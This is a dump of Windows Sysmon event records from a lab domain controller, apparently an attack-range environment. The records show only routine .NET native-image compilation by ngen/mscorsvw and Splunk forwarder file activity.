21:01:42.290{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A136-60D3-AB02-00000000CF01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.275{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A136-60D3-AB02-00000000CF01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.040{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A136-60D3-AA02-00000000CF01}6116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.025{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A136-60D3-AA02-00000000CF01}6116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.025{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A136-60D3-AA02-00000000CF01}6116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:43.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04970A851FC54FEF2AFFDAAA90F2BD5C,SHA256=0B830481E5740403BC5ADDC8F365CE55004748D5BBBB59FCF9590380C32DA8EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A138-60D3-AE02-00000000CF01}6772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.962{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A138-60D3-AE02-00000000CF01}6772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.962{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A138-60D3-AE02-00000000CF01}6772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A138-60D3-AD02-00000000CF01}2160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.884{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A138-60D3-AD02-00000000CF01}2160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.884{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A138-60D3-AD02-00000000CF01}2160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.822{4DB9351A-A138-60D3-AC02-00000000CF01}3836NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\N9MRKRGZ6I\System.Web.DynamicData.ni.dll.auxMD5=C22E91F150EDB4CD008D2BA33EF58E2E,SHA256=85F4BA0A6ABE1F9B527BB2BBDEC915FE6BDDD5C90E267B0C8A60A1F52A16AE25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.822{4DB9351A-A138-60D3-AC02-00000000CF01}3836NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\N9MRKRGZ6I\System.Web.DynamicData.ni.dllMD5=B78912A307E7BBA4F29DA437414DAF8A,SHA256=DF916CC92732377CD362D6C43ABD78C29B666A59FE4A76A0E5F4F0C7388C53BB,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:44.806{4DB9351A-A138-60D3-AC02-00000000CF01}3836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\efc-0\System.Web.DynamicData.dll2021-06-23 21:01:44.806 23542300x800000000000000019162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.728{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B6A662AAD1230828361BC218B87C3FF,SHA256=436E936045A90D2241BA5B8F7CA71C1F8443E8AF5E002D475EC5F1470E6FF528,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.259{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A138-60D3-AC02-00000000CF01}3836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.243{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A138-60D3-AC02-00000000CF01}3836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.243{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A138-60D3-AC02-00000000CF01}3836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.118{4DB9351A-A136-60D3-AB02-00000000CF01}5300NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G3H222JM0B\System.Web.Extensions.ni.dll.auxMD5=E8F4C36A4E6B40383EDA377A04AC3D80,SHA256=D26DEAE3EFF297F307D1DFEA752DA8C1138764F05CFF3BF2C4D1D6C483227224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:44.118{4DB9351A-A136-60D3-AB02-00000000CF01}5300NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G3H222JM0B\System.Web.Extensions.ni.dllMD5=82A7D13D9CDAECC5A12DAF807265050F,SHA256=7C2B3A8CF0A620E68934FC9E1DEE80B5309B281D686BDC02E85A8C2653BE4CCE,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:44.056{4DB9351A-A136-60D3-AB02-00000000CF01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\14b4-0\System.Web.Extensions.dll2021-06-23 21:01:44.056 11241100x800000000000000019192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:45.978{4DB9351A-A139-60D3-B202-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1038-0\System.Web.Entity.Design.dll2021-06-23 21:01:45.978 23542300x800000000000000019191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.900{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E32CAE9B52967ABED30B97FB590A2759,SHA256=AD8FAAAB71131B3AF5F5FF0483DA1133ED8870320B7EC9F51162E9E3A25457DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.681{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A139-60D3-B202-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.665{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A139-60D3-B202-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.665{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A139-60D3-B202-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.572{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A139-60D3-B102-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A139-60D3-B102-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.556{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A139-60D3-B102-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.509{4DB9351A-A139-60D3-B002-00000000CF01}1176NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TWOG0IDEFR\System.Web.Entity.ni.dll.auxMD5=BE26495AB227F594D84D68CBF2C3996E,SHA256=4016A70C60F130994F91566D1054BD5848CBB0A2DB2870417479C85EC78BF26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.509{4DB9351A-A139-60D3-B002-00000000CF01}1176NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TWOG0IDEFR\System.Web.Entity.ni.dllMD5=3B0956C6DB4C8B4C84FB1ACEC6F041F3,SHA256=B8D128580B589C369B21125268220ACEDBAC552DE5411CF313F6B63D83CD3E3F,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:45.493{4DB9351A-A139-60D3-B002-00000000CF01}1176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\498-0\System.Web.Entity.dll2021-06-23 21:01:45.493 23542300x800000000000000019181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.243{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 